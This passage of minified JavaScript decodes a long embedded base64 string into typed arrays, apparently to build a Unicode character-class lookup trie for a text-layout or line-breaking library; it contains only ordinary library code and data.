ge=function(fe){var _e,tt,dt,_t,gt,ce=.75*fe.length,ge=fe.length,je=0;"="===fe[fe.length-1]&&(ce--,"="===fe[fe.length-2]&&ce--);var kt="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array&&void 0!==Uint8Array.prototype.slice?new ArrayBuffer(ce):new Array(ce),Lt=Array.isArray(kt)?kt:new Uint8Array(kt);for(_e=0;_e<ge;_e+=4)tt=eh[fe.charCodeAt(_e)],dt=eh[fe.charCodeAt(_e+1)],_t=eh[fe.charCodeAt(_e+2)],gt=eh[fe.charCodeAt(_e+3)],Lt[je++]=tt<<2|dt>>4,Lt[je++]=(15&dt)<<4|_t>>2,Lt[je++]=(3&_t)<<6|63&gt;return kt}(fe),_e=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=4)ge.push(fe[_e+3]<<24|fe[_e+2]<<16|fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint32Array(ge),je=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=2)ge.push(fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint16Array(ge),dt=E_(je,12,_e[4]/2),_t=2===_e[5]?E_(je,(24+_e[4])/2):function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint32Array(Array.prototype.slice.call(fe,ce,ge))}(_e,Math.ceil((24+_e[4])/4));return new gl(_e[0],_e[1],_e[2],_e[3],dt,_t)}("AAAAAAAAAAAAEA4AGBkAAFAaAAACAAAAAAAIABAAGAAwADgACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAAQABIAEQATAAIABAACAAQAAgAEAAIABAAVABcAAgAEAAIABAACAAQAGAAaABwAHgAgACIAI4AlgAIABAAmwCjAKgAsAC2AL4AvQDFAMoA0gBPAVYBWgEIAAgACACMANoAYgFkAWwBdAF8AX0BhQGNAZUBlgGeAaMBlQGWAasBswF8AbsBwwF0AcsBYwHTAQgA2wG/AOMBdAF8AekB8QF0AfkB+wHiAHQBfAEIAAMC5gQIAAsCEgIIAAgAFgIeAggAIgIpAggAMQI5AkACygEIAAgASAJQAlgCYAIIAAgACAAKBQoFCgUTBRMFGQUrBSsFCAAIAAgACAAIAAgACAAIAAgACABdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABoAmgCrwGvAQgAbgJ2AggAHgEIAAgACADnAXsCCAAIAAgAgwIIAAgACAAIAAgACACKAggAkQKZAggAPADJAAgAoQKkAqwCsgK6AsICCADJAggA0AIIAAgACAAIANYC3gIIAAgACAAIAAgACABAAOYCCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAkASoB+QIEAAgACAA8AEMCCABCBQgACABJBVAFCAAIAAgACAAIAAgACAAIAAgACABTBVoFCAAIAFoFCABfBWUFCAAIAAgACAAIAAgAbQUIAAgACAAIAAgACABzBXsFfQWFBYoFigWKBZEFigWKBYoFmAWfBaYFrgWxBbkFCAAIAAgACAAIAAgACAAIAAgACAAIAMEFCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAMgFCADQBQgACAAIAAgACAAIAAgACAAIAAgACAAIAO4CCAAIAAgAiQAIAAgACABAAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAD0AggACAD8AggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIANYFCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAMDvwAIAAgAJAIIAAgACAAIAAgACAAIAAgACwMTAwgACAB9BOsEGwMjAwgAKwMyAwsFYgE3A/MEPwMIAEUDTQNRAwgAWQOsAGEDCAAIAAgACAAIAAgACABpAzQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFIQUoBSwFCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABtAwgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABMAEwACAAIAAgACAAIABgACAAIAAgACAC/AAgACAAyAQgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACACAAIAAwAAgACAAIAAgACAAIAAgACAAIAAAARABIAAgACAAIABQASAAIAAgAIABwAEAAjgCIABsAqAC2AL0AigDQAtwC+IJIQqVAZUBWQqVAZUBlQGVAZUBlQGrC5UBlQGVAZUBlQGVAZUBlQGVAXsKlQGVAbAK6wsrDGUMpQzlDJUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAfAKAAuZA64AtwCJALoC6ADwAAgAuACgA/oEpgO6AqsD+AAIAAgAswMIAAgACAAIAIkAuwP5AfsBwwPLAwgACAAIAAgACADRA9kDCAAIAOED6QMIAAgACAAIAAgACADuA/YDCAAIAP4DyQAIAAgABgQIAAgAXQAOBAgACAAIAAgACAAIABMECAAIAAgACAAIAAgACAD8AAQBCAAIAAgAGgQiBCoECAExBAgAEAEIAAgACAAIAAgACAAIAAgACAAIAAgACAA4BAgACABABEYECAAIAAgATAQYAQgAVAQIAAgACAAIAAgACAAIAAgACAAIAFoECAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAOQEIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAB+BAcACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEABhgSMBAgACAAIAAgAlAQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAwAEAAQABAADAAMAAwADAAQABAAEAAQABAAEAAQABHATAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAdQMIAAgACAAIAAgACAAIAMkACAAIAAgAfQMIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACACFA4kDCAAIAAgACAAIAOcBCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAIcDCAAIAAgACAAIAAgACAAIAAgACAAIAJEDCAAIAAgACADFAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABgBAgAZgQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAbAQCBXIECAAIAHkECAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAJwEQACjBKoEsgQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAC6BMIECAAIAAgACAAIAAgACABmBAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAxwQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAGYECAAIAAgAzgQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAigWKBYoFigWKBYoFigWKBd0FXwUIAOIF6gXxBYoF3gT5BQAGCAaKBYoFigWKBYoFigWKBYoFigWKBYoFigXWBIoFigWKBYoFigWKBYoFigWKBYsFEAaKBYoFigWKBYoFigWKBRQGCACKBYoFigWKBQgACAAIANEECAAIABgGigUgBggAJgYIAC4GMwaKBYoF0wQ3Bj4GigWKBYoFigWKBYoFigWKBYoFigWKBYoFigUIAAgACAAIAAgACAAIAAgAigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWLBf///////wQABAAEAAQABAAEAAQABAAEAAQAAwAEAAQAAgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAQADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAUAAAAFAAUAAAAFAAUAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAQABAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUAAQAAAAUABQAFAAUABQAFAAAAAAAFAAUAAAAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAFAAUAAQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABwAFAAUABQAFAAAABwAHAAcAAAAHAAcABwAFAAEAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAcABwAFAAUAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAAAQABAAAAAAAAAAAAAAAFAAUABQAFAAAABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAcABwAHAAcAAAAHAAcAAAAAAAUABQAHAAUAAQAHAAEABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABwABAAUABQAFAAUAAAAAAAAAAAAAAAEAAQABAAEAAQABAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABwAFAAUAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUAAQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABQANAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABAAEAAQABAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAQABAAEAAQABAAEAAQABAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAABQAHAAUABQAFAAAAAAAAAAcABQAFAAUABQAFAAQABAAEAAQABAAEAAQABAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUAAAAFAAUABQAFAAUAAAAFAAUABQAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAAAAAAAAAAAAUABQAFAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAUAAAAHAAcABwAFAAUABQAFAAUABQAFAAUABwAHAAcABwAFAAcABwAAAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAUABwAHAAUABQAFAAUAAAAAAAcABwAAAAAABwAHAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAABQAFAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABwAHAAcABQAFAAAAAAAAAAAABQAFAAAAAAAFAAUABQAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAFAAUABQAFAAUAAAAFAAUABwAAAAcABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAFAAUABwAFAAUABQAFAAAAAAAHAAcAAAAAAAcABwAFAAAAAAAAAAAAAAAAAAAABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAcABwAAAAAAAAAHAAcABwAAAAcABwAHAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAABQAHAAcABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAHAAcABwAAAAUABQAFAAAABQAFAAUABQAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAcABQAHAAcABQAHAAcAAAAFAAcABwAAAAcABwAFAAUAAAAAAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAcABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAUABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAFAAcABwAFAAUABQAAAAUAAAAHAAcABwAHAAcABwAHAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAHAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABwAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAUAAAAFAAAAAAAAAAAABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABwAFAAUABQAFAAUAAAAFAAUAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABwAFAAUABQAFAAUABQAAAAUABQAHAAcABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA